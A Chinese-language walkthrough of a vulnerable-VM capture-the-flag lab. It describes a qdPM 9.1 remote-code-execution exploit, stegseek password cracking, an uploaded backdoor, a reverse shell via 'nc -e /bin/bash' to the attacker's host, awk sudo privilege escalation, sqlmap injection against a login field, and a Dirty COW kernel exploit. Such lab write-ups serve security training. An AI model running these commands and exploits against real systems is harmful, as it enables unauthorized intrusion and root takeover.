靶机下载地址:下载链接
主机发现
因为在同一网段,所以直接用arp-scan -l 扫描,得到靶机ip地址
信息搜集
通过nmap进行信息搜集,得到开放端口22,80,并且有一个标题为qdPM
打开网页进行80端口的查看,发现只是一个登录页面
从中我们可以得到信息是关于qdPM9.1(一款基于Web的开源项目管理工具),从网上可以搜索到相关的命令执行漏洞,我们通过kali里面的searchsploit搜索一下,结果有可以利用的exp
接下来,直接将其两个可远程执行代码的exp拷贝下来,发现这两个的exp差不多,只是python的版本不一样,我们直接用第二个python3版本的代码,但是这个执行代码需要进行身份认证才能利用,所以还需要账号密码
通过前端的查找以及CMS源码的查找,发现原来的账号密码已经更改了,接下来用dirsearch扫描一下是否还有其他目录dirsearch -u http://ip
扫描之后,得到很多目录,一个一个查看之后,发现这个secret的目录里面的一张图片和靶机的名字一样,怀疑这里应该是突破点,所以用steghide查看一下图片信息,发现需要密码
漏洞利用
尝试用stegseek来爆破,让他输出为output
然后查看output,发现应该是登录的邮箱账号和密码
我们尝试登录,结果可以登陆进去,然后利用运行刚刚的exp,发现这个exp的格式不太准确,整理格式后就可以运行了,利用账号密码利用成功后,发现给我们生成了一个后门
在上传的目录中的users下可以发现我们上传的后门文件,输入id,返回成功
查看是否有nc
利用nc反弹nc -e /bin/bash 10.0.2.5 4444,得到shell
然后利用python升级shell
python -c 'import pty;pty.spawn("/bin/bash")'
权限提升
通过sudo查看,可以发现awk可以不需要密码而直接运用root权限,通过GTFobins里面的awk的sudo提权
从而得到root权限
在root目录下还有一个ova文件的靶机,接下来就需要把这个文件传入到kali上,然后再进行进一步打靶
可以利用python的http服务传输,也可以利用nc传输(-w 1表示传输完成后1秒就断开连接)
然后导入进虚拟机,通过arp-scan -l 发现导入成功
通过nmap扫描,发现也只开放了22,80端口
打开网页,发现就只有一个登录框,其他什么也没有
通过dirsearch扫描目录,额也没有其他目录。
尝试利用burp抓包来爆破一下,没有什么结果
然后,利用抓取的数据包用sqlmap来跑一下,发现参数uname可能存在注入
尝试看能不能得到数据库sqlmap -r 1.txt -p uname --dbms mysql --dbs --batch 发现得到了两个数据库,doubletrouble和information_scheam
显然,第一个数据库使我们想得到的,接着跑数据库里面的表
得到users表,接着跑列名
利用得到的账号密码尝试登录,发现居然不能登录,结合前面的22号端口的开放,尝试ssh登录,发现有一个账号可以登陆成功
发现并没有sudo命令,查看一下内核,结果是3.2版本的,这个版本存在脏牛提权
将脏牛提权的exp从网上下载下来https://github.com/FireFart/dirtycow/blob/master/dirty.c
然后利用nc传输到靶机中
将exp.c进行编译,编译完成之后将exp拷贝到/tmp目录下,给予执行权限,发现执行时需要输入密码(执行成功后,会自动创建一个用户firefart,这是设置它的登录密码123456)
成功之后,进行ssh登录,密码为123456
可以将其原来备份的/etc/passwd还原回去,并重新设置一下密码就可以以root账号登录
总结:通过网站发现是一个框架,查找CMS的账号和密码登录,发现已经被更改了,然后通过漏洞裤搜索,发现可以利用(但是需要登录),然后扫描目录,发现secret下的一张图片是关于靶机的提示,金星爆破密码得到登录账户密码,登陆成功后利用exp(这个exp就是登陆成功之后的温上传漏洞)得到靶机的www-data权限,通过查看sudo -l,发现awk没有密码可以直接以root权限使用,接下来利用https://gtfobins.github.io/里面的awk sudo提权成功,发现根本没有flag,发现root目录下还有靶机,于是就导入再次进行测试,最终发现登录框的参数存在SQL盲注,于是得到账号密码进行ssh登录成功,接着脏牛提权
125
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
